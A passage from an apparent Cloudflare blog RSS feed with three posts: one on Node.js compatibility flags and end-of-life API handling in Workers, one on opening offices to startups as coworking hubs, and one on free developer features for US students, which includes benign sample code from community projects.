    <td><span>node:console</span></td>
    <td><span>enable_nodejs_console_module</span></td>
    <td><span>disable_nodejs_console_module</span></td>
  </tr>
  <tr>
    <td><span>node:fs</span></td>
    <td><span>enable_nodejs_fs_module</span></td>
    <td><span>disable_nodejs_fs_module</span></td>
  </tr>
  <tr>
    <td><span>node:http (client)</span></td>
    <td><span>enable_nodejs_http_modules</span></td>
    <td><span>disable_nodejs_http_modules</span></td>
  </tr>
  <tr>
    <td><span>node:http (server)</span></td>
    <td><span>enable_nodejs_http_server_modules</span></td>
    <td><span>disable_nodejs_http_server_modules</span></td>
  </tr>
  <tr>
    <td><span>node:os</span></td>
    <td><span>enable_nodejs_os_module</span></td>
    <td><span>disable_nodejs_os_module</span></td>
  </tr>
  <tr>
    <td><span>node:process</span></td>
    <td><span>enable_nodejs_process_v2</span></td>
    <td></td>
  </tr>
  <tr>
    <td><span>node:zlib</span></td>
    <td><span>nodejs_zlib</span></td>
    <td><span>no_nodejs_zlib</span></td>
  </tr>
  <tr>
    <td><span>process.env</span></td>
    <td><span>nodejs_compat_populate_process_env</span></td>
    <td><span>nodejs_compat_do_not_populate_process_env</span></td>
  </tr>
</tbody></table></div><p>By separating these features, you can have more granular control over which Node.js APIs are available in your Workers. At first, we rolled out these features under the single <code>nodejs_compat</code> flag, but we quickly realized that some users perform feature detection based on the presence of certain modules and APIs, and that by enabling everything all at once we risked breaking some existing Workers. Users who check for the existence of these APIs manually can ensure new changes don’t break their Workers by opting out of specific APIs:</p>
            <pre><code>{
  "name": "my-worker",
  "main": "src/index.js",
  "compatibility_date": "2025-09-15",
  "compatibility_flags": [
    // Get everything Node.js compatibility related
    "nodejs_compat",
    // But disable the `node:zlib` module if necessary
    "no_nodejs_zlib",
  ]
}
</code></pre>
            <p>But, to keep things simple, <b>we recommend starting with the </b><code><b>nodejs_compat</b></code><b> flag, which will enable everything. You can always disable individual features later if needed.</b> There is no performance penalty to having the additional features enabled.</p>
    <div>
      <h3>Handling end-of-life'd APIs</h3>
      <a href="#handling-end-of-lifed-apis">
        
      </a>
    </div>
    <p>One important difference between Node.js and Workers is that Node.js has a <a href="https://nodejs.org/en/eol"><u>defined long term support (LTS) schedule</u></a> that allows it to make breaking changes at certain points in time. More specifically, Node.js can remove APIs and features when they reach end-of-life (EOL). On Workers, however, we have a rule that once a Worker is deployed, <a href="https://blog.cloudflare.com/backwards-compatibility-in-cloudflare-workers/"><u>it will continue to run as-is indefinitely</u></a>, without any breaking changes as long as the compatibility date does not change. This means that we cannot simply remove APIs when they reach EOL in Node.js, since this would break existing Workers. To address this, we have introduced a new set of compatibility flags that allow users to specify that they do not want the <code>nodejs_compat</code> features to include end-of-life APIs. These flags are based on the Node.js major version in which the APIs were removed:</p><p>The <code>remove_nodejs_compat_eol</code> flag will remove all APIs that have reached EOL up to your current compatibility date:</p>
            <pre><code>{
  "name": "my-worker",
  "main": "src/index.js",
  "compatibility_date": "2025-09-15",
  "compatibility_flags": [
    // Get everything Node.js compatibility related
    "nodejs_compat",
    // Remove Node.js APIs that have reached EOL up to your
    // current compatibility date
    "remove_nodejs_compat_eol",
  ]
}
</code></pre>
<ul><li><p>The <code>remove_nodejs_compat_eol_v22</code> flag will remove all APIs that reached EOL in Node.js v22. When using <code>remove_nodejs_compat_eol</code>, this flag will be automatically enabled if your compatibility date is set to a date after Node.js v22's EOL date (April 30, 2027).</p></li><li><p>The <code>remove_nodejs_compat_eol_v23</code> flag will remove all APIs that reached EOL in Node.js v23. When using <code>remove_nodejs_compat_eol</code>, this flag will be automatically enabled if your compatibility date is set to a date after Node.js v24's EOL date (April 30, 2028).</p></li><li><p>The <code>remove_nodejs_compat_eol_v24</code> flag will remove all APIs that reached EOL in Node.js v24. When using <code>remove_nodejs_compat_eol</code>, this flag will be automatically enabled if your compatibility date is set to a date after Node.js v24's EOL date (April 30, 2028).</p></li></ul><p>If you look at the date for <code>remove_nodejs_compat_eol_v23</code>, you'll notice that it is the same as the date for <code>remove_nodejs_compat_eol_v24</code>. That is not a typo! Node.js v23 is not an LTS release, and as such it has a very short support window. It was released in October 2024 and reached EOL in June 2025. Accordingly, we have decided to group the end-of-life handling of non-LTS releases into the next LTS release. This means that when you set your compatibility date to a date after the EOL date for Node.js v24, you will also be opting out of the APIs that reached EOL in Node.js v23. Importantly, these flags will not be automatically enabled until your compatibility date is set to a date after the relevant Node.js version's EOL date, ensuring that existing Workers will have plenty of time to migrate before any APIs are removed, or can choose to simply keep using the older APIs indefinitely via reverse compatibility flags like <code>add_nodejs_compat_eol_v24</code>.</p>
    <div>
      <h2>Giving back</h2>
      <a href="#giving-back">
        
      </a>
    </div>
<p>One other important bit of work that we have been doing is expanding Cloudflare's investment back into the Node.js ecosystem as a whole. There are now five members of the Workers runtime team (plus one summer intern) actively contributing to the <a href="https://github.com/nodejs/node"><u>Node.js project</u></a> on GitHub, two of whom are members of Node.js' Technical Steering Committee. While we have made a number of new feature contributions, such as an implementation of the Web Platform Standard <a href="https://blog.cloudflare.com/improving-web-standards-urlpattern/"><u>URLPattern</u></a> API and an improved implementation of <a href="https://github.com/nodejs/ncrypto"><u>crypto</u></a> operations, our primary focus has been on improving the ability of other runtimes to interoperate and be compatible with Node.js, fixing critical bugs, and improving performance. As we continue to grow our efforts around Node.js compatibility, we will also grow our contributions back to the project and ecosystem as a whole.</p>
<div><table><thead>
  <tr>
    <th><span>Aaron Snell</span></th>
    <th><span>2025 Summer Intern, Cloudflare Containers</span><br /><span>Node.js Web Infrastructure Team</span></th>
    <th><img src="https://images.ctfassets.net/zkvhlag99gkb/2ud1DF6HOI3ha2ySAhPOve/803132cf224695a48698afb806bf147b/Aaron.png?h=250" /></th>
  </tr>
  <tr>
    <th><img src="https://images.ctfassets.net/zkvhlag99gkb/2nqff7ZSEryQfXbl2OdwfJ/6b4a56a3e71f439032d3bc0413d2d72f/GitHub.png?h=250" /></th>
    <th><a href="https://github.com/flakey5"><span>flakey5</span></a></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>Dario Piotrowicz</span></td>
    <td><span>Senior System Engineer</span><br /><span>Node.js Collaborator</span></td>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/4K17bsjek1z4u2KRTtZ8uS/d7058dea515cb057a1727bcd01a0f5d2/Dario.png?h=250" /></td>
  </tr>
  <tr>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/2nqff7ZSEryQfXbl2OdwfJ/6b4a56a3e71f439032d3bc0413d2d72f/GitHub.png?h=250" /></td>
    <td><a href="https://github.com/dario-piotrowicz"><span>dario-piotrowicz</span></a></td>
  </tr>
  <tr>
    <td><span>Guy Bedford</span></td>
    <td><span>Principal Systems Engineer</span><br /><span>Node.js Collaborator</span></td>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/iYM8oWWSK89MesmQwctfc/4d86847238b1f10e18717771e2ad5ee8/Guy.png?h=250" /></td>
  </tr>
  <tr>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/2nqff7ZSEryQfXbl2OdwfJ/6b4a56a3e71f439032d3bc0413d2d72f/GitHub.png?h=250" /></td>
    <td><a href="https://github.com/guybedford"><span>guybedford</span></a></td>
  </tr>
  <tr>
    <td><span>James Snell</span></td>
    <td><span>Principal Systems Engineer</span><br /><span>Node.js TSC</span></td>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/4vN2YAqsEBlSnWtXRM0pTT/5e9130753ed71933fc94bc2c634425f3/James.png?h=250" /></td>
  </tr>
  <tr>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/2nqff7ZSEryQfXbl2OdwfJ/6b4a56a3e71f439032d3bc0413d2d72f/GitHub.png?h=250" /></td>
    <td><a href="https://github.com/jasnell"><span>jasnell</span></a></td>
  </tr>
  <tr>
    <td><span>Nicholas Paun</span></td>
    <td><span>Systems Engineer</span><br /><span>Node.js Contributor</span></td>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/4ePtfLAzk4pKYi4hU4dRLX/e4dcdfe86a4e54c4d02e356e2078d214/Nicholas.png?h=250" /></td>
  </tr>
  <tr>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/2nqff7ZSEryQfXbl2OdwfJ/6b4a56a3e71f439032d3bc0413d2d72f/GitHub.png?h=250" /></td>
    <td><a href="https://github.com/npaun"><span>npaun</span></a></td>
  </tr>
  <tr>
    <td><span>Yagiz Nizipli</span></td>
    <td><span>Principal Systems Engineer</span><br /><span>Node.js TSC</span></td>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/2nvpEqU0VHi3Se9fxJ5vE8/0f5628bc1756c7e3e363760be9c493ae/Yagiz.png?h=250" /></td>
  </tr>
  <tr>
    <td><img src="https://images.ctfassets.net/zkvhlag99gkb/2nqff7ZSEryQfXbl2OdwfJ/6b4a56a3e71f439032d3bc0413d2d72f/GitHub.png?h=250" /></td>
    <td><a href="https://github.com/anonrig"><span>anonrig</span></a></td>
  </tr>
</tbody></table></div><p>Cloudflare is also proud to continue supporting critical infrastructure for the Node.js project through its <a href="https://openjsf.org/blog/openjs-cloudflare-partnership"><u>ongoing strategic partnership</u></a> with the OpenJS Foundation, providing the project with free access to services such as Workers, R2, DNS, and more.</p>
    <div>
      <h2>Give it a try!</h2>
      <a href="#give-it-a-try">
        
      </a>
    </div>
    <p>Our vision for Node.js compatibility in Workers is not just about implementing individual APIs, but about creating a comprehensive platform that allows developers to run existing Node.js code seamlessly in the Workers environment. This involves not only implementing the APIs themselves, but also ensuring that they work together harmoniously, and that they integrate well with the unique aspects of the Workers platform.</p><p>In some cases, such as with <code>node:fs</code> and <code>node:crypto</code>, we have had to implement entirely new capabilities that were not previously available in Workers and did so at the native runtime level. This allows us to tailor the implementations to the unique aspects of the Workers environment and ensure both performance and security.</p><p>And we're not done yet. We are continuing to work on implementing additional Node.js APIs, as well as improving the performance and compatibility of the existing implementations. We are also actively engaging with the community to understand their needs and priorities, and to gather feedback on our implementations. If there are specific Node.js APIs or npm packages that you would like to see supported in Workers, <a href="https://github.com/cloudflare/workerd/"><u>please let us know</u></a>! If there are any issues or bugs you encounter, please report them on our <a href="https://github.com/cloudflare/workerd/"><u>GitHub repository</u></a>. While we might not be able to implement every single Node.js API, nor match Node.js' behavior exactly in every case, we are committed to providing a robust and comprehensive Node.js compatibility layer that meets the needs of the community.</p><p>All the Node.js compatibility features described in this post are <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/"><u>available now</u></a>. 
To get started, simply enable the <code>nodejs_compat</code> compatibility flag in your <code>wrangler.toml</code> or <code>wrangler.jsonc</code> file, or via the Cloudflare dashboard or API. You can then start using the Node.js APIs in your Workers applications right away.</p> ]]></content:encoded>
            <category><![CDATA[Node.js]]></category>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Servers]]></category>
            <guid isPermaLink="false">rMNgTNdCcEh6MjAlrKkL3</guid>
            <dc:creator>James M Snell</dc:creator>
        </item>
        <item>
            <title><![CDATA[Come build with us: Cloudflare's new hubs for startups]]></title>
            <link>https://blog.cloudflare.com/new-hubs-for-startups/</link>
            <pubDate>Mon, 22 Sep 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ In 2026, Cloudflare is opening our San Francisco, Austin, London, and Lisbon offices to builders and Startups. Participants of Workers Launchpad and Cloudflare for Startups Program will be eligible ]]></description>
<content:encoded><![CDATA[ <p>Cloudflare’s offices bring together builders in some of the world’s most popular technology hubs. We have a long history of using those spaces for one-off events and meetups over the last fifteen years, but we want to do more. Starting in 2026, we plan to open the doors of our offices routinely to startups and builders from outside of our team who need the space to collaborate, meet new people, or just type away at a keyboard in a new (and beautiful) location.</p>
    <div>
      <h2>What are our offices meant to be?</h2>
      <a href="#what-are-our-offices-meant-to-be">
        
      </a>
    </div>
    <p>Prior to 2020, we expected essentially every team member of Cloudflare to be present in one of our offices five days a week. That worked well for us and helped facilitate the launch of dozens of technologies as well as a community and culture that defined who we are.</p><p>Like every other team on the planet, the COVID pandemic forced us to revisit that approach. We used the time to think about what our offices could be, in a world where not every team member showed up every day of the week. While we decided we would be open to remote and hybrid work, we still felt like some of our best work was done in person together. The goal became building spaces that encouraged team members to be present.</p><p>Several hard hats and a few leases later, we’ve created a network of offices around the world designed to evolve with the way people work. These spaces aren’t just places to sit — they’re environments that empower people to do their best work — whether that means quiet focus, creative problem-solving, or lively collaboration. From a library tucked into a quiet zone in our waterfront Lisbon office, to the high-ceilinged collaboration areas in the heart of Austin, each office reflects our belief that great spaces support diverse working styles and help teams thrive together.</p><p>Our offices are meant to connect our teams, and we believe that by opening our doors to the wider community, we can foster even more innovation and help new companies collaborate better. Cloudflare has always been a hub for builders, and now we're making that commitment official by welcoming startups into our physical spaces.</p>
    <div>
      <h2>Why make them even more open to the community?</h2>
      <a href="#why-make-them-even-more-open-to-the-community">
        
      </a>
    </div>
<p>Our spaces have served as hosts to community events since the earliest days of Cloudflare. We have brought together just about every group from hackathons to language meetups to university orientation sessions. Cloudflare exists to help build a better Internet, and in many cases a better digital environment starts with relationships built in person.</p><p>One of the most common pieces of feedback we have received in the last few years after hosting these events is “I really miss connecting with people like this.” We hear that most often from small teams in the earliest stages of their journey, as the start-ups we support with our platform increasingly begin remote-first and only open dedicated spaces in later stages of their growth.</p><p>We know that building a company can be a lonely path. We have helped over the last several years by providing a robust <a href="https://www.cloudflare.com/plans/free/"><u>free plan</u></a> and a comprehensive <a href="https://www.cloudflare.com/forstartups/"><u>start-up program</u></a>, but we think we can do more.</p><p>Cloudflare’s network supports a significant percentage of the Internet and, as you would expect, the Internet follows the sun. More people use it during the daytime than at night, meaning our data center utilization peaks at specific times of the day. We take advantage of that pattern to run services that are less latency-sensitive in regions overnight.</p><p>Our physical locations follow a similar pattern. Utilization resembles a bell curve, with Tuesdays, Wednesdays, and Thursdays seeing a lot of traffic while Mondays and Fridays tend to be quieter. Like our CPUs at night, we think we can use that excess capacity to help build a better Internet by giving builders a space to congregate and helping our team connect with more of our users.</p>
    <div>
      <h2>How will this work?</h2>
      <a href="#how-will-this-work">
        
      </a>
    </div>
    <p>Beginning in January of 2026, we plan to make our office locations available to a capped number of external visitors as all-day coworking spaces on select days of each week. We will provide a registration process (more on that below) and set some ground rules. To start, we plan to expand this offering to San Francisco, Austin, London, and Lisbon.</p><p>When external visitors arrive, they’ll have access to our common spaces to bring together their teams or just get some work done by themselves. No mandatory talks or obligations. Just fantastic working spaces available to use at no cost.</p>
    <div>
      <h2>How can you participate?</h2>
      <a href="#how-can-you-participate">
        
      </a>
    </div>
<p>We will provide more details in the next few weeks, but the general structure will be based on the following steps.</p><ol><li><p>Enroll in the Cloudflare for Startups Program. Bonus if you are a Workers Launchpad participant or alumni.</p></li><li><p>Sit tight for now. We will first email participating Startup Program customers a form requesting office access.</p></li><li><p>Once the form is filled out, a member of our team will reach out. If you want to get a head start, fill out the form <a href="https://www.cloudflare.com/forstartups/"><u>here</u></a>.</p></li><li><p>We plan to roll this out on a cohort basis. Once approved and all requirements are met, register your visit (and that of any additional team members) at least three business days prior to the date requested.</p></li><li><p>Respect our working spaces as you would your own.</p></li></ol>
    <div>
      <h2>What’s next?</h2>
      <a href="#whats-next">
        
      </a>
    </div>
    <p>We hope to expand to other locations in the future. Want to get to the front of the line? Sign up for our Startup program <a href="https://www.cloudflare.com/forstartups/"><u>here</u></a> today and we will reach out to Startup Program participants before we roll out the program.</p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Workers Launchpad]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Cloudflare for Startups]]></category>
            <guid isPermaLink="false">5MEzKLtbg3GkbPxAkZtnRk</guid>
            <dc:creator>Christopher Rotas</dc:creator>
            <dc:creator>Caroline Quick</dc:creator>
        </item>
        <item>
            <title><![CDATA[Introducing free access to Cloudflare developer features for students]]></title>
            <link>https://blog.cloudflare.com/workers-for-students/</link>
            <pubDate>Mon, 22 Sep 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Students in the United States over the age of 18 with a .edu email can now get one year of free access to Cloudflare developer features. Build, experiment, and launch projects with production-grade  ]]></description>
            <content:encoded><![CDATA[ <p>I can recall countless late nights as a student spent building out ideas that felt like breakthroughs. My own thesis had significant costs associated with the tools and computational resources I needed. The reality for students is that turning ideas into working applications often requires production-grade tools, and having to pay for them can stop a great project before it even starts. We don’t think that cost should stand in the way of building out your ideas. </p><p>Cloudflare’s <a href="https://www.cloudflare.com/developer-platform/products/"><u>Developer Platform</u></a> already makes it easy for anyone to go from idea to launch. It gives you all the tools you need in one place to work on that class project, build out your portfolio, and create full-stack applications. We want students to be able to use these tools without worrying about the cost, so starting today, students at least 18 years old in the United States with a verified .edu email can receive 12 months of free access to Cloudflare’s developer features. This is the first step for <a href="http://www.cloudflare.com/students"><u>Cloudflare for Students</u></a>, and we plan to continue expanding our support for the next generation of builders.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7nFqJ4BZfhGHE8KEuJQbaX/993d1e40650f11f58a8b1f830dddf708/BLOG-2948_2.png" />
          </figure>
    <div>
      <h2>What’s included</h2>
      <a href="#whats-included">
        
      </a>
    </div>
    
    <div>
      <h3>12 months of our <a href="https://www.cloudflare.com/plans/developer-platform/"><u>paid</u></a> developer features plan at no upfront cost</h3>
      <a href="#12-months-of-our-developer-features-plan-at-no-upfront-cost">
        
      </a>
    </div>
    <p>Eligible student accounts will receive increased usage allotments for our developer features compared to our free plan. That includes Workers, Pages Functions, KV, Containers, Vectorize, Hyperdrive, Durable Objects, Workers Logpush, and Queues. With these, you can build everything from APIs and full-stack apps to data pipelines and websites. 

After 12 months, you can easily renew your subscription by upgrading to our <a href="https://www.cloudflare.com/plans/developer-platform-pricing/"><u>Workers Paid plan</u></a>. If you choose not to, your account will automatically revert to the free plan, and you won't be charged.

Here’s a look at the increased usage allotments students can receive today. Above those free allotments, our <a href="https://developers.cloudflare.com/workers/platform/pricing/"><b><u>standard usage rates will apply</u></b></a>.</p><table><tr><th><p>
</p></th><th><p><b>Free Plan</b></p></th><th><p><b>Student Accounts (Paid developer features)</b></p></th></tr><tr><td><p><a href="https://developers.cloudflare.com/workers/"><b><u>Workers</u></b></a></p></td><td><p>100,000 requests/day</p><p>

</p></td><td><p>10 million requests/month</p><p><b>+ $.30 per additional million requests</b></p></td></tr><tr><td><p><a href="https://developers.cloudflare.com/kv/"><b><u>Workers KV</u></b></a></p></td><td><p>100,000 read operations/day</p><p>1,000 write, delete, list operations per day</p></td><td><p>10 million read operations/month</p><p>1 million write, delete, and list operations per month</p></td></tr><tr><td><p><a href="https://developers.cloudflare.com/hyperdrive/"><b><u>Hyperdrive</u></b></a></p></td><td><p>100,000 database queries/day</p></td><td><p>Unlimited database queries / day</p></td></tr><tr><td><p><a href="https://developers.cloudflare.com/durable-objects/"><b><u>Durable Objects</u></b></a></p></td><td><p>100,000 requests/day	</p></td><td><p>1 million requests / day</p><p><b>+ $0.15 / per additional million requests</b></p></td></tr><tr><td><p><a href="https://developers.cloudflare.com/workers/observability/logs/workers-logs/"><b><u>Workers Logs</u></b></a></p></td><td><p>200,000 log events / day</p><p></p><p>3 Days of retention</p></td><td><p>20 million log events / month </p><p>7 Days of retention</p><p><b>+$0.60 per additional million events</b></p></td></tr><tr><td><p><a href="https://developers.cloudflare.com/workers/observability/logs/logpush/"><b><u>Workers Logpush</u></b></a></p></td><td><p>Not Included</p></td><td><p>10 million log events / month</p><p><b>+$0.05 per additional million log events</b></p></td></tr><tr><td><p><a href="https://developers.cloudflare.com/queues/"><b><u>Queues</u></b></a></p></td><td><p>Not Included</p></td><td><p>1 million operations/month included </p><p><b>+$0.40 per additional million operations</b></p></td></tr></table>
    <div>
      <h3>Access to a dedicated student developer community</h3>
      <a href="#access-to-a-dedicated-student-developer-community">
        
      </a>
    </div>
    <p>You’ll also have access to a dedicated <a href="https://discord.com/channels/595317990191398933/1417794672994287667"><u>Discord channel</u></a> just for students. We want to see what you’re building! This is a place to connect with peers, get support, and share ideas in a community of student developers.</p>
    <div>
      <h2>What others have built with Cloudflare’s Developer Platform</h2>
      <a href="#what-others-have-built-with-cloudflares-developer-platform">
        
      </a>
    </div>
    <p>Curious about what’s possible with Cloudflare’s developer features? Here are some projects from our community:</p>
    <div>
      <h3><a href="https://danifoldi.com/adventure"><u>Adventure</u></a> </h3>
      <a href="#">
        
      </a>
    </div>
    <p>by <a href="https://hu.linkedin.com/in/daniel-foldi"><u>Daniel Foldi</u></a></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4MUZkkTT0VlwEOaCnkxGMD/9d7845e992fbdfeb75b72ce9f0743497/BLOG-2948_3.png" />
          </figure><p>Adventure is a text-based adventure game running on Cloudflare Workers that uses <a href="https://www.cloudflare.com/developer-platform/products/workers-ai/"><u>Workers AI</u></a> to generate the stories with the <a href="https://developers.cloudflare.com/workers-ai/models/gemma-3-12b-it/"><u>@cf/google/gemma-3-12b-it</u></a> model.</p><p>The project’s developer chose <a href="https://www.cloudflare.com/developer-platform/products/workers-ai/"><u>Workers AI</u></a> with the <a href="https://opennext.js.org/cloudflare"><u>OpenNext adapter</u></a> because it made deployment simple and handled scaling automatically. It uses the Workers Paid plan mainly to enable <a href="https://developers.cloudflare.com/workers/observability/logs/logpush/"><u>Workers Logpush</u></a> and get access to detailed logs for better monitoring and analysis.</p><p>When a new game starts, the server gives the AI a custom prompt to set the scene and explain how the adventure should work. From there, each time the player makes a choice, their story history is sent back to the server, which asks the AI to continue the narrative, allowing the story to evolve dynamically based on the player’s choices.</p><p>The code below shows how this logic is implemented:</p>
            <pre><code>"use server";
import { getCloudflareContext } from "@opennextjs/cloudflare";

async function prime(env: CloudflareEnv) {
  const id = Math.floor(Math.random() * 1000000); // pseudo-random ID for each game run
  const messages = [
    {
      role: "user",
      content:
        `The user is playing a text-based adventure game. Each game is different, this is game ${id}. Your first job is to create a short background story in 3-4 sentences. Scenarios may include interesting locations such as jungles, deserts, caves.
        After the first message, each of your messages will be responses to the user interaction. State three short options (A, B, C). The user responses will be the chosen action. Your responses should end by asking the user about their choice.
        Your message will be shown to the user directly, so avoid "Certainly", "Great", "Let's get started", and other filler content, and avoid bringing up technical details such as "this is game #id".
        The games should have a win condition that is actually feasible given the story, and if the player loses, the message should end with "Try again.".
        `,
    },
  ];
  //Call Workers AI to generate the first response (story intro)
  const { response } = await env.AI.run("@cf/google/gemma-3-12b-it", { messages });

  return [
    ...messages,
    { role: "assistant", content: response }
  ];
}

/**
 * Main server action for the adventure game.
 * If no input yet, it primes the game with the opening story
 * If there is input, it continues the story based on the full history
 * Uses getCloudflareContext from @opennextjs/cloudflare to access env.
 */
export async function adventureAction(input: any[]) {
  let { env } = await getCloudflareContext({ async: true });

  return input.length === 0
  ? await prime(env)
  : [...input,
      { role: "assistant", content: (await env.AI.run("@cf/google/gemma-3-12b-it", { messages: input })).response }
  ];
}
</code></pre>
            
    <div>
      <h3><a href="https://github.com/MattIPv4/DNS-over-Discord"><u>DNS over Discord</u></a> </h3>
      <a href="#">
        
      </a>
    </div>
    <p>by <a href="https://uk.linkedin.com/in/matt-ipv4-cowley"><u>Matt Cowley</u></a></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/l35HNO2qVPzmR31EWupcy/3bc9f51cb2fa26654ca4a679e577ce98/BLOG-2948_4.png" />
          </figure><p>DNS over Discord is a bot that lets you run DNS lookups right inside Discord. Instead of switching to a terminal or online tool, you can use simple slash commands to check records like A, AAAA, MX, TXT, and more.</p><p>The developer behind the project chose <a href="https://www.cloudflare.com/developer-platform/products/workers/"><u>Cloudflare Workers</u></a> because it’s a great platform for running small JavaScript apps that handle requests, which made it a good fit for Discord’s slash commands. Since every command translates into a request and the bot sees a lot of traffic, the free tier wasn’t enough, so it now runs on Workers Paid to keep up reliably without hitting request limits.</p><p>In this project, the Worker checks if the request is a Discord interaction, and if so, it sends it to the right command (e.g., /dig, /multi-dig, etc.), using a handler that calls out to a <a href="https://github.com/MattIPv4/workers-discord"><u>custom framework</u></a> for Discord slash commands. If it’s not from Discord, it can also serve routes like the privacy page or terms of service.</p><p>Here’s what that looks like in code:</p>
            <pre><code>export default {
  // Process all requests to the Worker
  fetch: async (request, env, ctx) =&gt; {
    try {
      // Include the env in the context we pass to the handler
      ctx.env = env;

      // Check if it's a Discord interaction (or a health check)
      const resp = await handler(request, ctx);
      if (resp) return resp;

      // Otherwise, process the request
      const url = new URL(request.url);

      if (request.method === 'GET' &amp;&amp; url.pathname === '/privacy')
        return new textResponse(Privacy);

      if (request.method === 'GET' &amp;&amp; url.pathname === '/terms')
        return new textResponse(Terms);

      // Fallback if nothing matches
      return new textResponse(null, { status: 404 });
    } catch (err) {
      // Log any errors
      captureException(err);

      // Re-throw the error
      throw err;
    }
  },
};
</code></pre>
            
    <div>
      <h3><a href="http://placeholders.dev"><u>Placeholders.dev </u></a></h3>
      <a href="#">
        
      </a>
    </div>
    <p>by <a href="https://uk.linkedin.com/in/jamesross134"><u>James Ross</u></a></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/18CfHbpzQJGrYTTda86cU8/31b5419cba4799301e3e4116cf8149c9/BLOG-2948_5.png" />
          </figure><p><code>placeholders.dev</code> is a service that generates placeholder images, making it easy for developers to prototype and scaffold websites without dealing with hosting or asset management. Users can generate placeholders instantly with a simple URL, such as: <code>https://images.placeholders.dev/350x150</code></p><p>Since placeholders are typically used in early development, speed and consistency matter, and images need to load instantly so the workflow isn’t interrupted. Running on Cloudflare Workers makes the service fast and consistent no matter where developers are.</p><p>This project uses the Workers Paid plan because it regularly exceeds the free-tier limits on requests and compute time. The Worker below shows the core of how the service works. When a request comes in, it looks at the URL path (like /<code>300x150</code>) to determine the size of the placeholder, applies some defaults for style, and then returns an SVG image on the fly.</p>
            <pre><code>export default {
  async fetch(request: Request, env: Env, ctx: ExecutionContext) {
    try {
      const url = new URL(request.url);
      const cache = caches.default;

      // Handle requests for the placeholder API
      if (url.host === 'images.placeholders.dev' || url.pathname.startsWith('/api')) {
        // Try edge cache first
        const cached = await cache.match(url, { ignoreMethod: true });
        if (cached) return cached;

        // Default placeholder options
        const imageOptions: Options = {
          dataUri: false, // always return an unencoded SVG source
          width: 300,
          height: 150,
          fontFamily: 'sans-serif',
          fontWeight: 'bold',
          bgColor: '#ddd',
          textColor: 'rgba(0,0,0,0.5)',
        };

        // Parse sizes from path (e.g. /350 or /350x150)
        const sizeParts = url.pathname.replace('/api', '').replace('/', '').split('x');
        if (sizeParts[0]) {
          const width = sanitizeNumber(parseInt(sizeParts[0], 10));
          const height = sizeParts[1] ? sanitizeNumber(parseInt(sizeParts[1], 10)) : width;
          imageOptions.width = width;
          imageOptions.height = height;
        }

        // Generate SVG placeholder
        const response = new Response(simpleSvgPlaceholder(imageOptions), {
          headers: { 'content-type': 'image/svg+xml; charset=utf-8' },
        });

        // Cache result
        response.headers.set('Cache-Control', 'public, max-age=' + cacheTtl);
        ctx.waitUntil(cache.put(url, response.clone()));

        return response;
      }

      return new Response('Not Found', { status: 404 });
    } catch (err) {
      console.error(err);
      return new Response('Internal Error', { status: 500 });
    }
  },
};
</code></pre>
            <p>Check out <a href="https://workers.cloudflare.com/built-with/collections/workers"><u>Built With Workers</u></a> to see what other developers are building with our developer platform.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2fjxaPtQYSIFVVfDaXqYSU/57d4c94d129832dd77c0a9fc20b812a6/BLOG-2948_6.png" />
          </figure>
    <div>
      <h2>How do I get started?</h2>
      <a href="#how-do-i-get-started">
        
      </a>
    </div>
    <p>This offering is available to United States students at least 18 years old with a <a href="https://developers.cloudflare.com/fundamentals/user-profiles/verify-email-address/"><u>verified</u></a> .edu billing email address. </p><p>Just ensure your <a href="https://developers.cloudflare.com/fundamentals/user-profiles/verify-email-address/"><u>verified</u></a> .edu email address is added to <a href="https://developers.cloudflare.com/billing/update-billing-info/#update-billing-email-address"><u>your billing details</u></a> and add our Workers Paid plan to your subscription.</p><table><tr><th><p>
</p></th><th><p><b>New .edu accounts</b></p></th><th><p><b>Existing .edu accounts</b></p></th></tr><tr><td><p>Creation date</p></td><td><p>Created on/after September 22, 2025</p></td><td><p>Created prior to September 22, 2025</p></td></tr><tr><td><p>Confirm your eligibility</p></td><td><p><a href="https://www.cloudflare.com/sign-up"><u>Sign up</u></a> for a free Cloudflare account, add your credit card, and ensure your <a href="https://developers.cloudflare.com/fundamentals/user-profiles/verify-email-address/"><u>verified</u></a> .edu email address is added to <a href="https://developers.cloudflare.com/billing/update-billing-info/#update-billing-email-address"><u>your billing details</u></a>.</p></td><td><p>Ensure your <a href="https://developers.cloudflare.com/fundamentals/user-profiles/verify-email-address/"><u>verified</u></a> .edu email address is <a href="https://developers.cloudflare.com/billing/update-billing-info/#update-billing-email-address"><u>added to your billing details</u></a>.</p></td></tr><tr><td><p>How to redeem</p></td><td><p>Visit your <a href="https://dash.cloudflare.com/?to=/:account/workers/plans/purchase"><u>Workers Plans page</u></a> in the dashboard and add the Workers Paid plan to your subscription</p></td><td><p></p></td></tr></table><p><sub><i>Note: in order to receive the credit, your verified .edu email address needs to be your billing email address.</i></sub></p>
    <div>
      <h2>Expanding Cloudflare for Students coverage</h2>
      <a href="#expanding-cloudflare-for-students-coverage">
        
      </a>
    </div>
